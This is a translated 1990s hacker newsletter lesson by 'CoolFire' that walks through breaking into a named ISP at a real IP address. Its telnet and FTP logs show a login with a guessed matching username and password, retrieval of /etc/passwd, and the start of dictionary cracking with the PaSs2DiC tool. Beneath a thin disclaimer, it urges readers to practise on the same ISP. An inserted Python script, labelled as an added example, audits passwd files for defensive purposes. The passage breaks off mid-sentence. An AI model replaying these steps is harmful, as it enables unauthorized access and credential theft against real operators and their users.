CoolHC Volume 3 By CoolFire.docx


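This is not a tutorial; it only tells you how systems get cracked, so that you can protect your own system. If you read this document all the way through, you will know how computer hackers break into your computer. I am CoolFire. My purpose in writing this article is to make everyone understand the importance of computer security, not to teach people to crack passwords. If anyone uses this document to maliciously break into someone else's computer or network, I accept no responsibility!!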

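The previous installments talked about the NetCoffee shops. Fortunately they do not offer dial-up access to their customers; otherwise the customers whose passwords or accounts were stolen would be badly embarrassed!

However, during these two weeks of exploring, while looking for the W3 password of a site resembling a net-café site, CoolFire strayed into an ISP that bills itself as the first to offer dial-up network access. After successfully retrieving /etc/passwd, CoolFire used his own PaSs2DiC + CJack to crack the passwords and, unexpectedly, in less than 1 minute found 9 accounts whose ID and Password were identical. Don't blame me for not warning everyone here. Fortunately I did not find the root password; otherwise that system might have ground to a halt and never seen the light of day again! (Of course I would never do that!)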

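Looking at the recently emerging net cafés and the security measures of the major web sites, together with what CoolFire ran into at a recent meeting, it is not hard to see that our country is striding quickly into high technology. But if the security of these systems is not strengthened, one day all someone will need is one computer plus one modem to bring down the whole country's finance, industry and commerce! Everyone be careful!

An ISP is the source through which ordinary users dial in, so technically it ought to be stronger, yet it is still easily broken into, and it has not taught its users correct network habits (how to set a password, how to use a proxy, and so on). I really don't dare imagine what such a network will look like in a few years??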

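This installment still does not cover any new techniques. Now that James has updated the home page, you should already be able to learn a lot from it. If you want to learn intrusion, you must keep up with the latest information (not needed for intruding into our own country's networks, since nobody takes network security seriously anyway..... really disappointing), and grab /etc/passwd one step ahead, before others have fixed the bug. So subscribing to some network-security mailing lists is necessary, and reading more security-related newsgroups is necessary too (this is not only for hackers; ISPs should pay even more attention to this information!). When I have time later I will compile some mailing lists for everyone!!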

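Topic of this installment:

How to connect to this ISP and decode its /etc/passwd. Address: .tw (203.66.169.11)

Special note:

Because this installment uses real addresses and names, CoolFire has already mailed the maintainer of that web page to change the password, but that page's ISP is still good practice material for beginners!

The content of the mail CoolFire sent to the page maintainer is as follows. If he still does not change it quickly, there is nothing more I can do!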

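Mail sent to dhacme@.tw:

Subject: Please change your web page password immediately
From: CoolFire

Your web page is nicely done, but the password you set is too easy for hackers to break. Please change your web page access password promptly after seeing this letter; otherwise, if the page is defaced next time, I accept no responsibility!!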

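**** Lesson begins ****

Please note:

Because this lesson is mainly hands-on, everything below is taken from the log file of the Telnet software I use, except that my own IP has been changed. Those with a weak sense of ethics should therefore not read the detailed cracking content below; otherwise I accept no responsibility!

(After connecting to some host.... the .tw here is a fake domain name)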

.tw> telnet .tw
Trying 203.66.169.11...
Connected to .tw.
Escape character is '^]'.
Password:                 (just press Enter)
Login incorrect
www login: coffee         (a hacker's keen guess: username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from .tw
欢迎光临.......           (rest omitted! Since it concerns this ISP's reputation, go and see it for yourselves!)

=================================================================

(Straight to the core part)

www:~$ cd /etc
www:/etc$ ls
DIR_COLORS          hosts.equiv             printcap
HOSTNAME            hosts.lpd               profile
NETWORKING          inet@                   protocols
NNTP_INEWS_DOMAIN   inetd.conf              psdevtab
X11@                inittab                 rc.d/
at.deny             inittab.gettyps.sample  resolv.conf
bootptab            ioctl.save              rpc
csh.cshrc           issue                   securetty
csh.login                                   securetty.old
default/            klogd.pid               sendmail.cf
diphosts            ld.so.cache             sendmail.st
exports             ld.so.conf              services
fastboot            lilo/                   shells
fdprm               lilo.conf               shutdownpid
fs/                 localtime               skel/
fstab               magic                   slip.hosts
ftp.banner          mail.rc                 slip.login
ftp.deny            motd                    snooptab
ftpaccess           motd.bak                sudoers
ftpconversions      msgs/                   syslog.conf
ftpgroups           mtab                    syslog.pid
ftpusers            mtools                  termcap
gateways            named.boot              ttys
gettydefs           networks                utmp@
group               nntpserver              vga/
host.conf           passwd                  wtmp@
hosts               passwd.OLD              yp.conf.example
hosts.allow         passwd.old
hosts.deny          ppp/

(Let's see what our target looks like???)

www:/etc$ cat passwd


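(CoolFire's note: Because PaSs2DiC makes it very easy to find accounts whose ID and Password are identical, I have altered the encoded password field of every account whose password I found, except Coffee..... unless you try them one by one~~~ I didn't say that!)

www:/etc$ exit
logout
Connection closed by foreign host.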
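
From the defender's side, the weaknesses of the kind seen in this session's /etc/passwd can be checked for mechanically. The following is an added example, not part of CoolFire's original text: it audits a passwd-format file for hashes kept in the world-readable file, extra UID 0 accounts and system accounts left with a login shell, and it rejects a proposed password that is only the login name in disguise. The sample entries, the UID threshold of 500 and all function names are assumptions made for illustration.

```python
# Added example (not from the original text). SAMPLE is constructed for
# illustration; the hash field is a placeholder, not a real hash.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
alice:PLACEHOLDERHASH:501:20:Alice Example:/home/staff/alice:/bin/bash
shop:x:507:100:Shop:/home/w3/shop:/bin/bash
spare:x:0:0::/tmp:/bin/sh
"""

NO_HASH = {"x", "*", "!", "!!", "*LK*"}   # shadowed or locked markers
# An empty shell field defaults to /bin/sh, so it counts as interactive.
INTERACTIVE = {"", "/bin/sh", "/bin/bash", "/bin/csh", "/bin/tcsh"}
HASH_EXPOSED = "password hash stored in world-readable file"
EMPTY_PW = "empty password field"
EXTRA_ROOT = "UID 0 account other than root"
SERVICE_SHELL = "system account with interactive shell"

def audit_passwd(text, min_user_uid=500):
    """Return (account, issue) pairs; min_user_uid is an assumed site convention."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue                       # skip blank or malformed lines
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if pw == "":
            findings.append((name, EMPTY_PW))
        elif pw not in NO_HASH:
            findings.append((name, HASH_EXPOSED))
        try:
            uid_n = int(uid)
        except ValueError:
            continue
        if uid_n == 0 and name != "root":
            findings.append((name, EXTRA_ROOT))
        if uid_n < min_user_uid and name != "root" and shell in INTERACTIVE:
            findings.append((name, SERVICE_SHELL))
    return findings

def username_derived(name, gecos, candidate):
    """True if a proposed password is only the login name or GECOS in disguise."""
    c = candidate.lower()
    bases = {name.lower(), gecos.lower().replace(" ", "")} - {""}
    return any(c in (b, b[::-1], b + b) or c.strip("0123456789") == b
               for b in bases)

if __name__ == "__main__":
    for account, issue in audit_passwd(SAMPLE):
        print(f"{account}: {issue}")
```

The second function is meant to run where a password is set or changed, before it is ever hashed, so it needs no access to stored hashes.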

(Time to go!! Switch to FTP and fetch /etc/passwd back!)

.tw> ftp .tw
Connected to .tw.
220-
220-欢迎光临.......        (rest omitted! Since it concerns this ISP's reputation, go and see it for yourselves!)
220-
220-
220-There are 0 users in FTP Server now.
220-目前已有0使用者在此Server上.
220-If you have any suggestion, please mail to:
220-service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(Log in with the same account as before)

Name (.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

(Go straight to where the file is kept)

ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

ttys

fdprm

group

issue

motd

mtools

profile

securetty

shells

termcap

skel

csh.cshrc

csh.login

lilo

inet

default

services

HOSTNAME

DIR_COLORS

passwd

passwd.OLD

wtmp

utmp

gettydefs

inittab.gettyps.sample

ld.so.conf

ld.so.cache

at.deny

fs

magic

rc.d

syslog.conf

printcap

inittab

sudoers

vga

diphosts

mail.rc

ppp

NNTP_INEWS_DOMAIN

sendmail.st

NETWORKING

gateways

bootptab

exports

ftpusers

host.conf

hosts

hosts.allow

hosts.deny

hosts.equiv

inetd.conf

named.boot

networks

nntpserver

protocols

resolv.conf

rpc

ftpaccess

hosts.lpd

ftpconversions

snooptab

msgs

ftpgroups

slip.login

slip.hosts

yp.conf.example

X11

lilo.conf

sendmail.cf

fstab

fastboot

mtab

syslog.pid

klogd.pid

shutdownpid

localtime

passwd.old

ioctl.save

psdevtab

ftp.banner

ftp.deny

motd.bak

securetty.old

226 Transfer complete.

(Retrieve the file)

ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(Leave as quickly as possible)

ftp> bye
221 Goodbye.

All right! Once you have /etc/passwd, everything is easy. Quickly take out your treasured PaSs2DiC!! Run it right away and let it generate the dictionary file automatically:

C:\hack>pass2dic
PaSs2DiC V0.2 (C) 1996 By FETAG Software Development Co. R.O.C. TAIWAN.
This tool will:
[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target
Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe
PaSs2DiC Author: James Lin E-Mail: fetag@.tw
FETAG Software Development Co: .tw/~fetag
C:\hack>

(That's it! The automatically generated output is placed in the file dic.cfe. Let's run B
